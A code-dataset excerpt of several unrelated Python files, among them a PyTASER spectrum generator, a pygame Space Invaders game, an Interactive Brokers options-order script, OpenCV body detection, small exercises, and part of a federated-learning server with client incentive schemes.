multiprocessing. If not set, defaults to one\n less than the number of CPUs available.\n\n Returns:\n DAS class containing the following inputs;\n - das_total: overall deltaT DAS spectrum for new system - reference system.\n - jdos_new_sys_total: overall JDOS for the new system.\n - jdos_new_sys_if: JDOS for the new system across the energy mesh for a specific band\n transition i (initial) -> f (final) [dict]\n - jdos_ref_total: overall JDOS for the reference system.\n - jdos_ref_if: JDOS for the reference system across the energy mesh for a specific band\n transition i (initial) -> f (final) [dict]\n - energy_mesh_ev: Energy mesh of spectra in eV, with an interval of 'step'.\n - bandgap: Bandgap of the system, in eV, rounded to 2 decimal points\n - temp: Temperature of the system, in K\n - alpha_ref: Absorption coefficient of the reference system, in cm^-1 (only\n calculated if the DASGenerator has been generated from VASP outputs)\n - alpha_new_sys: Absorption coefficient of the new system, in cm^-1 (only\n calculated if the DASGenerator has been generated from VASP outputs\n - weighted_jdos_diff_if: JDOS difference (from reference to new system) across the energy\n mesh for a specific band transition i (initial) -> f (final), weighted by the\n oscillator strength of the transition [dict]\n - weighted_jdos_new_sys_if: JDOS of new system across the energy mesh for a specific band\n transition i (initial) -> f (final), weighted by the oscillator strength of\n the transition [dict]\n \"\"\"\n bandgap_ref = round(\n self.reference_system.bs.get_band_gap()[\"energy\"], 2\n )\n bandgap_new_sys = round(self.new_system.bs.get_band_gap()[\"energy\"], 2)\n\n energy_mesh_ev = np.arange(energy_min, energy_max, step)\n\n (\n jdos_ref_total,\n jdos_ref_if,\n alpha_ref,\n weighted_jdos_ref_if,\n ) = Internal_Abs.generate_abs(\n self.reference_system,\n temp,\n energy_min,\n energy_max,\n gaussian_width,\n cshift,\n step,\n ref_occs,\n processes,\n )\n\n (\n jdos_new_sys_total,\n jdos_new_sys_if,\n alpha_new_sys,\n weighted_jdos_new_sys_if,\n ) = Internal_Abs.generate_abs(\n self.new_system,\n temp,\n energy_min,\n energy_max,\n gaussian_width,\n cshift,\n step,\n new_sys_occs,\n processes,\n )\n\n das_total = jdos_new_sys_total - jdos_ref_total\n # need to interpolate alpha arrays onto JDOS energy mesh:\n if self.reference_system.dfc and self.new_system.dfc is not None:\n das_total = alpha_new_sys - alpha_ref\n\n return Das(\n das_total,\n jdos_new_sys_total,\n jdos_new_sys_if,\n jdos_ref_total,\n jdos_ref_if,\n energy_mesh_ev,\n bandgap_new_sys,\n bandgap_ref,\n temp,\n alpha_new_sys if self.new_system.dfc is not None else None,\n alpha_ref if self.reference_system.dfc is not None else None,\n weighted_jdos_new_sys_if\n if self.new_system.dfc is not None\n else None,\n weighted_jdos_ref_if\n if self.reference_system.dfc is not None\n else None,\n )\n","repo_name":"WMD-group/PyTASER","sub_path":"pytaser/das_generator.py","file_name":"das_generator.py","file_ext":"py","file_size_in_byte":9544,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"33"} +{"seq_id":"25959046775","text":"import pygame\nimport random\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\nSCREEN_MARGIN = 5\nCOLLISION = 100\n\n\ndef isCollision(x1, y1, x2, y2):\n dx = x1 - x2\n dy = y1 - y2\n dist = dx*dx + dy*dy\n if dist <= COLLISION:\n return True\n return False\n\n\nclass Character:\n def __init__(self):\n self.name = \"player\"\n self.sprite = None\n self.sprite_w = 0\n self.sprite_h = 0\n self.coord_X = 0\n self.coord_Y = 0\n self.speed_X = 0.5\n self.speed_Y = 0.5\n\n def set(self, name, sprite, sprite_width, sprite_height, x, y, speed_X=0.5, speed_Y=0.5):\n self.name = name\n self.sprite = sprite\n self.sprite_w = sprite_width\n self.sprite_h = sprite_height\n self.coord_X = x\n self.coord_Y = y\n self.speed_X = speed_X\n self.speed_Y = speed_Y\n\n def set_random_coordinated(self, x_min, x_max, y_min, y_max):\n self.coord_X = random.randint(x_min, x_max)\n self.coord_Y = random.randint(y_min, y_max)\n\n def move(self, dx=0.0, dy=0.0):\n self.coord_X += dx\n self.coord_Y += dy\n\n def draw(self, screen):\n screen.blit(self.sprite, (self.coord_X, self.coord_Y))\n\n\nclass SpaceInvaders:\n def __init__(self):\n # Initialize pygame\n pygame.init()\n\n # Set screen\n self.screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n\n # Set title\n pygame.display.set_caption(\"Space Invaders\")\n icon = pygame.image.load(\"sprites/spaceship.png\")\n pygame.display.set_icon(icon)\n\n # Set score\n self.score_value = 0\n\n # Set Clock\n self.clock = pygame.time.Clock()\n\n # Set player\n sprite = pygame.image.load(\"sprites/playership.png\")\n p_w, p_h = sprite.get_rect().size\n self.player = Character()\n self.player.set(\"spaceship\", sprite, p_w, p_h, SCREEN_WIDTH / 2 - p_w / 2,\n SCREEN_HEIGHT - p_h - p_h / 2, speed_X=6)\n\n # Set bullet\n # sprite = pygame.image.load(\"sprites/rocket.png\")\n sprite = pygame.image.load(\"sprites/rocket_16_x_16.png\")\n p_w, p_h = sprite.get_rect().size\n self.rocket = Character()\n self.rocket.set(\"rocket\", sprite, p_w, p_h, SCREEN_WIDTH / 2 - p_w / 2,\n SCREEN_HEIGHT - p_h - p_h / 2, speed_Y=-10)\n\n # Set enemy\n self.enemy = []\n self.enemy_fleet = 1\n for i in range(self.enemy_fleet):\n self.enemy.append(self.create_enemy())\n\n # Set background\n self.background = pygame.image.load(\"sprites/universe.png\")\n\n def set_text_info(self):\n font = pygame.font.Font(\"freesansbold.ttf\", 16)\n score = font.render(\"Score : \" + str(self.score_value), True, (200, 0, 0))\n enemy_fleet = font.render(\"Enemy Fleet : \" + str(self.enemy_fleet), True, (200, 0, 0))\n self.screen.blit(score, (10, 10))\n self.screen.blit(enemy_fleet, (10, 30))\n\n def game_over(self):\n font = pygame.font.Font(\"freesansbold.ttf\", 32)\n r = random.randint(0, 255)\n g = random.randint(0, 255)\n b = random.randint(0, 255)\n game_over = font.render(\"Game Over!\", True, (r, g, b))\n restart = font.render(\"Press r to restart...\", True, (r, g, b))\n self.screen.blit(game_over, (SCREEN_WIDTH / 2 - 32, 10))\n self.screen.blit(restart, (SCREEN_WIDTH / 2 - 32, 40))\n\n def create_enemy(self):\n sprite = pygame.image.load(\"sprites/spaceship_rot_180.png\")\n p_w, p_h = sprite.get_rect().size\n enemy = Character()\n speed_X = random.randint(1, 3)\n speed_Y = random.randint(10, 30)\n enemy.set(\"enemyship\", sprite, p_w, p_h, 0, 0, speed_X=speed_X, speed_Y=speed_Y)\n enemy.set_random_coordinated(SCREEN_MARGIN, SCREEN_WIDTH - SCREEN_MARGIN - enemy.sprite_w - 1, 50, 150)\n return enemy\n\n def exec(self):\n # Set the main loop\n running = True\n fire = False\n render = True\n rockdiv = self.player.sprite_w / self.rocket.sprite_w\n dx = 0\n dy = 0\n key_pressed = {\"K_LEFT\": False, \"K_RIGHT\": False}\n while running:\n self.screen.fill((0, 0, 0))\n self.screen.blit(self.background, (0, 0))\n\n # Player Movement\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n dx = -self.player.speed_X\n key_pressed[\"K_LEFT\"] = True\n elif event.key == pygame.K_RIGHT:\n dx = self.player.speed_X\n key_pressed[\"K_RIGHT\"] = True\n elif event.key == pygame.K_SPACE:\n fire = True\n elif event.key == pygame.K_r:\n render = True\n self.score_value = 0\n self.enemy = []\n self.enemy_fleet = 1\n for i in range(self.enemy_fleet):\n self.enemy.append(self.create_enemy())\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n dx = 0\n key_pressed[\"K_LEFT\"] = False\n if key_pressed[\"K_RIGHT\"]:\n dx = self.player.speed_X\n elif event.key == pygame.K_RIGHT:\n dx = 0\n key_pressed[\"K_RIGHT\"] = False\n if key_pressed[\"K_LEFT\"]:\n dx = -self.player.speed_X\n\n if 5 <= self.player.coord_X <= SCREEN_WIDTH - SCREEN_MARGIN - self.player.sprite_w:\n self.player.move(dx=dx, dy=dy)\n elif self.player.coord_X <= SCREEN_MARGIN:\n self.player.coord_X = SCREEN_MARGIN\n elif self.player.coord_X >= SCREEN_WIDTH - SCREEN_MARGIN - self.player.sprite_w:\n self.player.coord_X = SCREEN_WIDTH - SCREEN_MARGIN - self.player.sprite_w\n\n if fire:\n self.rocket.coord_Y += self.rocket.speed_Y\n if self.rocket.coord_Y <= SCREEN_MARGIN:\n fire = False\n self.rocket.coord_X = self.player.coord_X + self.player.sprite_w / rockdiv + \\\n self.rocket.sprite_w / 2\n self.rocket.coord_Y = self.player.coord_Y + self.player.sprite_h / rockdiv\n else:\n self.rocket.coord_X = self.player.coord_X + self.player.sprite_w / rockdiv + self.rocket.sprite_w / 2\n self.rocket.coord_Y = self.player.coord_Y + self.player.sprite_h / rockdiv\n\n # Enemy Movement\n for i in range(self.enemy_fleet):\n self.enemy[i].coord_X += self.enemy[i].speed_X\n if SCREEN_WIDTH - SCREEN_MARGIN - self.enemy[i].sprite_w <= self.enemy[i].coord_X or \\\n SCREEN_MARGIN >= self.enemy[i].coord_X:\n self.enemy[i].speed_X *= -1\n self.enemy[i].coord_Y += self.enemy[i].speed_Y\n\n if isCollision(self.enemy[i].coord_X + self.enemy[i].sprite_w / 2,\n self.enemy[i].coord_Y + self.enemy[i].sprite_h / 2,\n self.player.coord_X + self.player.sprite_w / 2, self.player.coord_Y):\n render = False\n\n if isCollision(self.enemy[i].coord_X + self.enemy[i].sprite_w / 2,\n self.enemy[i].coord_Y + self.enemy[i].sprite_h / 2,\n self.rocket.coord_X + self.rocket.sprite_w / 2, self.rocket.coord_Y):\n fire = False\n self.rocket.coord_X = self.player.coord_X + self.player.sprite_w / rockdiv + \\\n self.rocket.sprite_w / 2\n self.rocket.coord_Y = self.player.coord_Y + self.player.sprite_h / rockdiv\n self.enemy[i].set_random_coordinated(SCREEN_MARGIN,\n SCREEN_WIDTH - SCREEN_MARGIN - self.enemy[i].sprite_w - 1,\n 50, 150)\n self.score_value += self.enemy_fleet\n self.enemy_fleet += 1\n self.enemy.append(self.create_enemy())\n\n self.enemy[i].draw(self.screen)\n if render:\n self.rocket.draw(self.screen)\n self.player.draw(self.screen)\n else:\n self.game_over()\n self.set_text_info()\n\n pygame.display.update()\n self.clock.tick(120)\n","repo_name":"JohnCrabs/Space_Invader","sub_path":"space_invaders.py","file_name":"space_invaders.py","file_ext":"py","file_size_in_byte":8869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"15393251406","text":"from ibapi.client import EClient\nfrom ibapi.wrapper import EWrapper\nfrom ibapi.contract import Contract\nfrom ibapi.ticktype import TickTypeEnum\nfrom ibapi.order import *\n\nfrom threading import Timer\n\nimport yfinance as yf\n\nENV = \"prod\"\n\nport = {\n \"staging\": 7497,\n \"prod\": 7496\n }\n\nsymbol = \"SPY\"\nexpdate_glob = \"\"\nstrike_glob = 0\nct_size = 1\n\ndte = {\n \"SPX\": 0,\n \"SPY\": 2,\n \"TSLA\": 1,\n \"AAPL\": 0\n }\n\n\ndef symToYF(symbol):\n if symbol == \"SPX\":\n return \"^SPX\"\n return symbol\n\ndef updateGlobalVar(symbol, dtestep):\n global expdate_glob\n global strike_glob\n strike_glob = 0\n stock = yf.Ticker(symToYF(symbol))\n latest_price = stock.history(period='2d', interval='1m')['Close'][-1]\n basetime = stock.options[dtestep].replace('-', '') # get 3-5dte date\n\n expdate_glob = basetime\n\n for strike in stock.option_chain().calls['strike']:\n if(abs(strike - latest_price) < abs(strike_glob - latest_price)):\n strike_glob = strike\n\n print(\"Option Info: \" + symbol + \" \" + expdate_glob + \" \" + str(strike_glob))\n return\n\ndef printLastOptionInfo():\n print(\"Last Option Info: \" + symbol + \" \" + expdate_glob + \" \" + str(strike_glob))\n stock = yf.Ticker(symToYF(symbol))\n\n for i in range(6):\n print(\"dtestep = \" + str(i) + \"expdate: \" + stock.options[i].replace('-', ''))\n return\n\n\n\nclass OrderApp(EWrapper, EClient):\n optRight = \"C\"\n quantity = 1\n action = \"BUY\"\n\n def __init__(self):\n EClient.__init__(self, self)\n\n def __init__(self, optRight, quantity, action):\n EClient.__init__(self, self)\n self.optRight = optRight\n self.quantity = quantity\n self.action = action\n\n def tickPrice(self, reqId, tickType, price, attrib):\n print(\"Tick Price. Ticker Id:\", reqId, \"tickType:\", TickTypeEnum.to_str(tickType))\n\n def tickSize(self, reqId, tickType, size):\n print(\"Tick Size. Ticker Id:\", reqId, \"tickType\", TickTypeEnum.to_str(tickType), \"Size:\", size)\n\n def error(self, reqId, errorCode, errorString):\n print(\"Error: \", reqId, \" \", errorCode, \" \", errorString)\n\n def contractDetails(self, reqId, contractDetails):\n print(\"contractDetails: \", reqId, \" \", contractDetails)\n\n def historicalData(self, reqId, bar):\n print(\"HistoricalData. \", reqId, \"Date:\", bar.date, \"Open:\", bar.open, \"High:\", bar.high, \"Low:\", bar.low, \"Close:\", bar.close, \"Volume:\", bar.volume)\n\n def nextValidId(self, orderId):\n self.nextOrderId = orderId\n self.start()\n\n def orderStatus(self, orderId, status, filled, remaining, avgFillPrice, permId, parentId, lastFillPrice, clientId, whyHeld, mktCapPriceA):\n print(\"OrderStatus. Id: \", orderId, \", Status: \", status, \", Filled: \", filled, \",Remaining: \", remaining, \", LastFillPrice: \", lastFillPrice)\n\n def openOrder(self, orderId, contract, order, orderState):\n print(\"OpenOrder. ID:\", orderId, contract.symbol, contract.secType, \"@\", contract.exchange, \":\", order.action, order.orderType, order.totalQuantity, orderState.status)\n\n def execDetails(self, reqId, contract, execution):\n print(\"ExecDetails. \", reqId, contract.symbol, contract.secType, contract.currency, execution.execId, execution.orderId, execution.shares, execution.lastLiquidity)\n\n\n def start(self):\n global expdate_glob, strike_glob, symbol\n contract = Contract()\n contract.symbol = symbol\n contract.secType = \"OPT\"\n contract.exchange = \"SMART\"\n contract.currency = \"USD\"\n contract.lastTradeDateOrContractMonth = expdate_glob\n contract.strike = strike_glob\n contract.right = self.optRight\n contract.multiplier = \"100\"\n\n order = Order()\n order.action = self.action\n order.totalQuantity = self.quantity\n order.orderType = \"MKT\"\n order.eTradeOnly = ''\n order.firmQuoteOnly = ''\n\n\n self.placeOrder(self.nextOrderId, contract, order)\n\n def stop(self):\n self.done = True\n self.disconnect()\n\n\ndef run(optRight, ct_size, action):\n app = OrderApp(optRight, ct_size, action)\n app.nextOrderId = 0\n\n app.connect(\"127.0.0.1\", port[ENV], 0)\n\n\n #app.reqContractDetails(1, contract)\n #app.reqMarketDataType(4)\n #app.reqMktData(1, contract, \"\", False, False, [])\n #app.reqHistoricalData(1, contract, \"\", \"1 D\", \"1 min\", \"MIDPOINT\", 0, 1, False, [])\n\n Timer(3, app.stop).start()\n app.run()\n\nif __name__ == \"__main__\":\n updateGlobalVar(symbol, dte[symbol])\n while(True):\n print(\"ENV: \" + ENV)\n printLastOptionInfo()\n txt = \"\"\"\n Enter command: [TickerName | dte | [0-4] ]\n TickerName. (e.g SPX) Change Underlying Security \n dte. Update Stock DTE\n 0. Set Size\n 1. Buy Call\n 2. Buy Put\n 3. Sell Call\n 4. Sell Put\n \"\"\"\n print(txt)\n try:\n cmd = input()\n \n if cmd == '1':\n updateGlobalVar(symbol, dte[symbol])\n run(\"C\", ct_size, \"BUY\")\n elif cmd == '2':\n updateGlobalVar(symbol, dte[symbol])\n run(\"P\", ct_size, \"BUY\")\n elif cmd == '3':\n run(\"C\", ct_size, \"SELL\")\n elif cmd == '4':\n run(\"P\", ct_size, \"SELL\")\n elif cmd in dte.keys():\n symbol = cmd\n updateGlobalVar(symbol, dte[symbol])\n elif cmd == \"dte\":\n print(dte)\n ndte = int(input(\"select dte step: \"))\n dte[symbol] = ndte\n elif cmd == '0':\n ct_size = int(input(\"select size:\"))\n except Exception as e:\n print(e)\n","repo_name":"vuduclong0309/LongAndShortLite","sub_path":"src/bot/ibapi-tws/placeAtmOption.py","file_name":"placeAtmOption.py","file_ext":"py","file_size_in_byte":5776,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"33"} +{"seq_id":"17923008017","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 25 04:07:14 2020\r\nCSE 30 Spring 2020 Program 4 starter code\r\n@author: Fahim\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport cv2\r\n\r\n#Download the required files/sample videos from the Google Drive\r\ncascade1 = cv2.CascadeClassifier('haarcascade_fullbody.xml')\r\ncascade2 = cv2.CascadeClassifier('haarcascade_upperbody.xml')\r\ncascade3 = cv2.CascadeClassifier('haarcascade_lowerbody.xml')\r\n\r\ncap = cv2.VideoCapture(\"sample.webm\")\r\n#cap = cv2.VideoCapture(0)\r\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\r\nout = cv2.VideoWriter('output.avi',fourcc, 20.0, (640,480))\r\n\r\nwhile 1:\r\n ret, img = cap.read()\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\n body1 = cascade1.detectMultiScale(gray, 1.3, 5)\r\n body2 = cascade2.detectMultiScale(gray, 1.3, 5)\r\n body3 = cascade3.detectMultiScale(gray, 1.3, 5)\r\n\r\n for (x, y, w, h) in body1:\r\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)\r\n\r\n for (x, y, w, h) in body2:\r\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)\r\n\r\n\r\n for (x, y, w, h) in body3:\r\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n\r\n image = cv2.resize(img, (640,480))\r\n out.write(image)\r\n cv2.imshow('img', img)\r\n k = cv2.waitKey(30) & 0xff\r\n if k == 27:\r\n break\r\n\r\ncap.release()\r\nout.release()\r\ncv2.destroyAllWindows()","repo_name":"azsara/SIPCSE02","sub_path":"method2.py","file_name":"method2.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"9835482667","text":"def fun(d,n):\r\n s = 0\r\n a = sorted(d.values())\r\n # print(a)\r\n # for i in sorted(d.values()):\r\n # print(i)\r\n # s+=i\r\n # print(s)\r\n min1 = 99999999\r\n i = 0\r\n j = 3\r\n while (i <= (len(a) - 3) and j < len(a)):\r\n if (abs(a[i] - a[j]) <= min1):\r\n l = []\r\n min1 = abs(a[i] - a[j])\r\n p = i\r\n q = j\r\n i += 1\r\n j += 1\r\n # print(a[p:q+1])\r\n res = {}\r\n for i in d.keys():\r\n if d[i] in a[p:q + 1]:\r\n res[i] = d[i]\r\n print(str(res), min1)\r\n # s=\"Here the goodies that are selected for distribution are:\"+\"\\n\"+str(res)+\"\\n\"+\"And the diffrenece between the chossen goodie with highest price and the lowest price is\"+str(min1)\r\n # print(s)\r\n x=[]\r\n x.append(res)\r\n x.append(min1)\r\n return x\r\n\r\ndef display(d,diff):\r\n s = \"The goodies selected for distribution are:\" + \"\\n\" + \"\\n\"\r\n for i in d:\r\n s += i + \": \" + str(d[i]) + \"\\n\"\r\n s += \"\\n\" + \"And the difference between the chosen goodie with highest price and the lowest price is \" +str(diff)\r\n f=open(\"sample_output.txt\",\"w\")\r\n f.write(s)\r\n f.close()\r\n\r\n\r\nmyfile = open(\"sample_input.txt\",\"r\") #Opening file\r\na1=myfile.readline()\r\nn=int(a1[21]) #Number of emloyees\r\na1=myfile.readline()\r\na1=myfile.readline()\r\na1=myfile.readline()\r\n\r\nd={} #Extracting input values from file to dictionary\r\nfor i in range(10):\r\n a1=myfile.readline()\r\n a=a1.split(\": \")\r\n d[a[0]]=int(a[1])\r\nx=fun(d,n)\r\nd=x[0]\r\ndiff=x[1]\r\ndisplay(d,diff)\r\n","repo_name":"siddusk18/goodies.py-highpeak-code","sub_path":"siddu.py","file_name":"siddu.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"18204424963","text":"\"\"\"\nhttps://leetcode.com/explore/featured/card/april-leetcoding-challenge-2021/594/week-2-april-8th-april-14th/3707/\nhttps://leetcode.com/problems/partition-list/\n\nGiven the head of a linked list and a value x, partition it such that all nodes less than x come before nodes greater than or equal to x.\n\nYou should preserve the original relative order of the nodes in each of the two partitions.\n\n\n\nExample 1:\n\n\nInput: head = [1,4,3,2,5,2], x = 3\nOutput: [1,2,2,4,3,5]\nExample 2:\n\nInput: head = [2,1], x = 2\nOutput: [1,2]\n\n\nConstraints:\n\nThe number of nodes in the list is in the range [0, 200].\n-100 <= Node.val <= 100\n-200 <= x <= 200\n\"\"\"\nfrom Common.DataTypes.Leetcode import ListNode\nfrom Common.ObjectTestingUtils import run_functional_tests\nfrom Common.Helpers.TestParamsHelpers import convert_test_params_to_lists\n\n\n# Runtime: 32 ms, faster than 80.18% of Python3 online submissions for Partition List.\n# Memory Usage: 14.1 MB, less than 85.40% of Python3 online submissions for Partition List.\nclass Solution:\n def partition(self, head: ListNode, x: int) -> ListNode:\n i, j, i0, j0 = None, None, None, None\n while head:\n next = head.next\n if head.val < x:\n if not i0:\n i0 = head\n if i:\n i.next = head\n i = head\n else:\n if not j0:\n j0 = head\n if j:\n j.next = head\n j = head\n head = next\n if j:\n j.next = None\n if i:\n i.next = j0\n return i0 or j0\n\n\ntests = [\n [\n [1,4,3,2,5,2],\n 3,\n [1,2,2,4,3,5]\n ],\n [\n [2,1],\n 2,\n [1,2]\n ]\n]\n\n# print(list_length(build_list(tests[0][0])))\n# print(list_length(build_list(tests[1][0])))\n\nrun_functional_tests(Solution().partition, convert_test_params_to_lists(tests, [0, 2]))\n","repo_name":"wtain/LeetCodePython","sub_path":"DataStructures/Basic/Lists/PartitionList.py","file_name":"PartitionList.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"30996714763","text":"def avoid(words,letters):\n for l in words:\n if l not in letters:\n continue\n else:\n print (\"has avoided letters\")\n return False\n \n print (\"Words have no avoided letters\")\n return True\n\navoid(\"good\",\"aer\")\navoid(\"bedd\",\"aer\")\n\ndef avoids(letters):\n count=0\n new_list=list(letters)\n fin=open(\"words.txt\")\n for line in fin:\n words=line.strip()\n for letter in words:\n if not letter in new_list:\n print(letter)\n continue\n \n else:\n break\n\n print(words)\n \n #count=count+1\n #print (\"Number of words that don't contain avoided letters: \", count)\n\n \n#avoided_letters=input(\"Please type some avoided letters \\n\")\n#avoids(\"cd\")\n","repo_name":"catechnix/greentree","sub_path":"avoid.py","file_name":"avoid.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"10649000540","text":"import services as svc\n\nmessage = \"\"\n\n\ndef get_message(disconnected, client, my_turn, matrix):\n global message\n while True:\n if len(disconnected) == 1:\n break\n msg = svc.receive(client)\n event = svc.check_event_message(\n msg, client, my_turn, disconnected, matrix)\n if msg and not event:\n message = msg\n if len(matrix) < 1:\n print(f\"{msg}\\n\")\n print('\\n\\nDesconectado do servidor. Feche a página para sair.\\n')\n return\n\n\ndef get_current_message():\n global message\n return message\n","repo_name":"Tavress/Redes-I","sub_path":"Jogo-v3/Cliente/message_handler.py","file_name":"message_handler.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"17733505671","text":"from audioop import avg\nimport copy\nimport gc\nimport logging\nfrom pickletools import optimize\nimport random\n# from this import d\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom tqdm.auto import tqdm\nfrom collections import OrderedDict\nfrom .svfl.svfl import calculate_sv\nfrom .fifl.fifl import calculate_reward\nfrom .rrafl.rrafl import *\nfrom .models import *\nfrom .utils import *\nfrom .oort.oort import create_training_selector, create_testing_selector\nfrom .oort.clientSampler_oort import clientSampler_Oort\n\nlogger = logging.getLogger(__name__)\n\n\nclass Server(object):\n \"\"\"Each server class will instantiate required amount of clients needed to complete FL task.\n 1. init Server with config defined in config.yaml\n 2. Server to init weights to the choosen model and distribute it to all clients, Server selects some clients to contribute the model weight updates based on reputation\n 3. Communication round starts\n 4. Client to contribute their data (i.i.d or non-i.i.d)\n 5. (optional) Clients maybe malicious or simply honest or struggling\n 6. Server aggrgregates the weights based on FedAvg method\n \n Key Attributes:\n clients: List containing Client instances participating a federated learning.\n __round: Int for indcating the current federated round.\n writer: SummaryWriter instance to track a metric and a loss of the global model.\n model: torch.nn instance for a global model.\n seed: Int for random seed.\n device: Training machine indicator (e.g. \"cpu\", \"cuda\", \"mps\").\n data_path: Path to read data.\n dataset_name: Name of the dataset.\n num_shards: Number of shards for simulating non-IID data split (valid only when 'iid = False\").\n iid: Boolean Indicator of how to split dataset (IID or non-IID).\n init_config: kwargs for the initialization of the model.\n fraction: Ratio for the number of clients selected in each federated round.\n num_clients: Total number of participating clients.\n local_epochs: Epochs required for client model update.\n batch_size: Batch size for updating/evaluating a client/global model.\n criterion: torch.nn instance for calculating loss.\n optimizer: torch.optim instance for updating parameters.\n optim_config: Kwargs provided for optimizer.\n \"\"\"\n def __init__(self, id, writer, device, model_config={}, global_config={}, init_config={}, fed_config={}, optim_config={}, rep_config={}, bad_client_config={}, _clients=[], data_config={}, test_data=[], data_loader=None, V=1):\n self.id = id\n self.clients = _clients \n self.dataloader = data_loader\n self.data = test_data\n self._round = 0\n self.writer = writer\n self.device = device\n \n self.data_path = data_config[\"data_path\"]\n self.dataset_name = data_config[\"dataset_name\"]\n self.iid = data_config[\"iid\"] \n \n self.model = eval(model_config[\"name\"])(**model_config)\n self.seed = global_config[\"seed\"]\n self.global_grad = None\n \n self.num_clients = fed_config[\"K\"] #number of clients, irrelevant, set to 0\n self.fraction = fed_config[\"C\"] #Fraction of sampled clients to be used for aggregation, set to 1\n self.num_rounds = fed_config[\"R\"] #communication rounds\n self.local_epochs = fed_config[\"E\"] #number of epochs in device\n self.batch_size = fed_config[\"B\"] #batch size \n self._V = fed_config[\"V\"] #weight param for lyapunov\n self.multiplier_g = fed_config[\"multiplier_g\"]\n self.criterion = fed_config[\"criterion\"]\n self.incentive_type = fed_config[\"incentive\"]\n self.total_budget = fed_config[\"total_budget\"]\n self.exe_cost_per_client = fed_config[\"exe_cost_per_client\"]\n self.time_required = fed_config[\"time_required\"]\n self.init_config = init_config\n \n self.rep_threshold = rep_config['reputation_threshold']\n self.client_cost_per_data = rep_config['client_cost_per_data']\n \n self._Q = 0\n self.l2norm = 0\n self.hired_px_hist = []\n self.avg_price = 1\n self.opt_bid = 0\n self.total_bid = 0\n \n #dictionary; idx = client_idx, value = [rep, alpha, beta, most recent accuracy]\n self.client_rep_list = {}\n #for oort\n self.sampled_cliet_set = set()\n self.PR_budget = 0\n self.hire_budget = 0\n self.used_PR_budget = 0\n self.invoke_cost = 0\n\n # self.hire_count_prev = 0\n self.hire_count_now = 0\n \n # self.num_bad_clients = bad_client_config['bad_K'] # number of bad clients included in count for num_clients\n # self.client_attack = bad_client_config['attack']\n # self.client_attack_prop = bad_client_config['prop_attack']\n\n self.results = {\"loss\": [], \"accuracy\": []} \n self.utility_history = []\n self.PR_used_budget_hist = []\n self._Q_hist = []\n\n\n self.stale_threshold = 0\n self.staleness = 0\n self.learner_staleness = {l: 0 for l in range(self.num_clients)}\n self.learner_local_step = {l: 0 for l in range(self.num_clients)}\n self.learner_cache_step = {l: 0 for l in range(self.num_clients)}\n self.clock_factor = 1\n\n #clients on hold out \n self.pendingWorkers = {}\n self.exploredPendingWorkers = []\n self.virtualClientClock = {}\n self.avgUtilLastEpoch = 0.\n self.clientsLastEpoch = []\n self.sumDeltaWeights = []\n self.last_sampled_clients = None\n\n self.global_virtual_clock = 0.\n self.round_duration = 0.\n self.clock_factor = 1\n \n def setup(self, **init_kwargs):\n \"\"\"Set up all configuration for federated learning.\"\"\"\n # valid only before the very first round\n assert self._round == 0\n \n # initialize weights of the model\n torch.manual_seed(self.seed)\n init_net(self.model, self.device, **self.init_config, )\n\n message = f\"[Round: {str(self._round).zfill(4)}] ...successfully initialized model (# parameters: {str(sum(p.numel() for p in self.model.parameters()))})!\"\n print(message); logging.info(message)\n del message; gc.collect()\n self.transmit_model()\n # if self.incentive_type == \"Reverse\" or self.incentive_type == \"ReverseMod\":\n self.basic_PR_budget = self.total_budget / self.num_rounds\n self.PR_budget = self.basic_PR_budget\n\n if self.incentive_type == 'oort':\n self.oort_train_selector = create_training_selector()\n self.oort_test_selector = create_testing_selector()\n #simple init to feedback\n feedbacks = {'reward': 0, 'duration':0 , 'time_stamp':1, 'count': 0, 'status': True}\n #regist all clients first into the arms\n for client in self.clients:\n self.oort_train_selector.register_client(client.get_id(), feedbacks)\n\n def set_incentive_type(self, type):\n self.incentive_type = type\n\n #-------------------CLIENT RELATED FUNCTIONS-----------------------------------------------------\n \"\"\"Step 1.Select clients based on selected criteria\"\"\" \n def sample_clients(self, client_visit_arr, clients_bids): \n message = f\"[Server: {str(self.id)}, Round: {str(self._round).zfill(4)}] Select clients...!\"\n print(message); logging.info(message)\n del message; gc.collect()\n \n num_sampled_clients = max(int(self.fraction * (self.num_clients)), 1)\n sampled_client_indices = []\n \n #shuffle client rep list to visit clients randomly\n # if (len(self.client_rep_list) != 0):\n # self.client_rep_list = {k:self.client_rep_list[k] for k in random.sample(list(self.client_rep_list.keys()), len(self.client_rep_list))} \n # print(self.client_rep_list)\n\n # Sample clients based on their reputation from federation POV\n if (self._round >= 1):\n if self.incentive_type == \"SV\":\n total_asking_price = 0\n #build another list of clients that has higher rep than threshold\n for key in (client_visit_arr):\n if(key in self.client_rep_list.keys()):\n if 